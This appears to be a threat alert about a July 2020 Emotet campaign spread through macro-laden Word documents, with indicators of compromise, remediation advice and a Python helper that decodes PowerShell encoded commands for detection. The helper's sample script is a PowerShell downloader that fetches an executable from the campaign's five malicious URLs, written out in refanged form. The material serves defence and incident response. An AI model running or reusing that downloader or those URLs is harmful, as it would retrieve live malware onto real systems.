Rewterz Threat Alert – Emotet Still Active – IoCs

Severity

High

Analysis Summary

Emotet remains active in the wild with its July 2020 campaign. The campaign is delivered as a malicious Microsoft Word document whose lure is a creative variation on the usual "Enable Content" prompt. The attack flow is shown below.

[Figure: Emotet July 2020 process graph. VMRay Analyzer Report showing the verdict and process graph of a sample from the Emotet campaign, July 2020.]

Document template

The document carries a highly obfuscated macro that executes as soon as the document is opened and content is enabled. The macro launches a PowerShell instance, passing the payload as an encoded command on the command line. The decoded commands attempt to download Emotet from five hardcoded hosts in turn and save it under a fixed file name specified in the command itself; the file is later moved to %AppData%\msvcr100\.
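The encoded-command stage above is the point where a responder can recover the download hosts directly from process telemetry: PowerShell's -EncodedCommand argument is just the script as UTF-16LE text, base64-encoded. The following is an added example, not code from Rewterz or from the campaign itself: it decodes such an argument, pulls out the embedded URLs, and matches them against the URL indicators listed in this alert. The sample command line is constructed for the example, modelled on the behaviour described (an array of the five advisory URLs and a fixed output name); the file name 123.exe is a placeholder, as the real name is not given on this page.

```python
"""Decode a PowerShell -EncodedCommand argument, extract download URLs, and match
them against the advisory's URL indicators. Added example; the encoded command is a
constructed stand-in modelled on the described macro behaviour, not the real payload."""
import base64
import re

# URLs from the Indicators of Compromise section, refanged for matching.
IOC_URLS = {
    "http://mapas.hoonicorns.pt/comp3/ly8cmti/",
    "https://lovely-lollies.com/wp-admin/fgvid/",
    "https://connect-plus.co.uk/aspnet_client/3yey3rr/",
    "https://www.angage.com/wp-content/mtincvc/",
    "http://www.20190607.com/wp-admin/ixyjozs/",
}

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
# "-ep" (ExecutionPolicy) and "-ExecutionPolicy" deliberately do not match.
ENC_ARG_RE = re.compile(r"(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"`;,)]+", re.IGNORECASE)


def encode_powershell(script: str) -> str:
    """Encode the way PowerShell expects for -EncodedCommand: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_powershell(blob: str) -> str:
    """Inverse of encode_powershell."""
    return base64.b64decode(blob).decode("utf-16-le")


def defang(url: str) -> str:
    """Make a URL safe to paste into a report (hxxp, bracketed dots)."""
    return url.replace("http", "hxxp").replace(".", "[.]")


def analyze_command_line(cmdline: str) -> dict:
    """Given a process command line, decode the encoded command (if any) and report
    the defanged URLs it contains, their hosts, and which URLs match the advisory IoCs."""
    m = ENC_ARG_RE.search(cmdline)
    if not m:
        return {"encoded": False, "urls": [], "hosts": [], "ioc_hits": []}
    script = decode_powershell(m.group(1))
    urls = URL_RE.findall(script)
    hosts = sorted({re.sub(r"^https?://", "", u, flags=re.IGNORECASE).split("/")[0].lower()
                    for u in urls})
    hits = [u for u in urls if u.lower() in IOC_URLS]
    return {
        "encoded": True,
        "script": script,
        "urls": [defang(u) for u in urls],
        "hosts": hosts,
        "ioc_hits": [defang(u) for u in hits],
    }


# Constructed stand-in for the macro's PowerShell stage: the five hardcoded hosts from
# the advisory and a fixed output name. '123.exe' is a placeholder, not the real name.
SAMPLE_SCRIPT = (
    "$u='http://mapas.hoonicorns.pt/comp3/ly8cmti/','https://lovely-lollies.com/wp-admin/fgvid/',"
    "'https://connect-plus.co.uk/aspnet_client/3yey3rr/','https://www.angage.com/wp-content/mtincvc/',"
    "'http://www.20190607.com/wp-admin/ixyjozs/';"
    "$f=\"$env:USERPROFILE\\123.exe\";"
    "foreach($x in $u){try{(New-Object Net.WebClient).DownloadFile($x,$f);break}catch{}}"
)
SAMPLE_CMDLINE = "powershell -w hidden -enc " + encode_powershell(SAMPLE_SCRIPT)

if __name__ == "__main__":
    result = analyze_command_line(SAMPLE_CMDLINE)
    print("hosts:", ", ".join(result["hosts"]))
    for u in result["ioc_hits"]:
        print("IoC hit:", u)
```

Feed it the CommandLine field from Sysmon Event ID 1 or Windows Security Event 4688 (with command-line auditing enabled) for PowerShell children of WINWORD.EXE; a Word process spawning PowerShell with an encoded argument is itself a strong signal, even before any URL matches an indicator.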

Impact

  • Credential Theft
  • Information Theft
  • Financial Theft

Indicators of Compromise

Domain Name

  • mapas[.]hoonicorns[.]pt
  • www[.]20190607[.]com
  • connect-plus[.]co[.]uk
  • lovely-lollies[.]com

MD5

  • d40863c1d11d96d51e09252558e09946

SHA-256

  • cc4e6e42f73500c72d0d0820b4a3c131e2f8fce4d7d730eb8f9fc1b5cc3e882e

SHA-1

  • f4a52b0eccaaebfeb65ee380be4c10c114d0fcfb

Source IP

  • 212[.]51[.]142[.]238
  • 198[.]144[.]158[.]120
  • 109[.]117[.]53[.]230

URL

  • http[:]//mapas[.]hoonicorns[.]pt/comp3/ly8cmti/
  • https[:]//lovely-lollies[.]com/wp-admin/fgvid/
  • https[:]//connect-plus[.]co[.]uk/aspnet_client/3yey3rr/
  • https[:]//www[.]angage[.]com/wp-content/mtincvc/
  • http[:]//www[.]20190607[.]com/wp-admin/ixyjozs/

Remediation

  • Block the threat indicators at their respective controls.
  • Do not download email attachments from untrusted senders.
  • Do not enable macros in untrusted documents.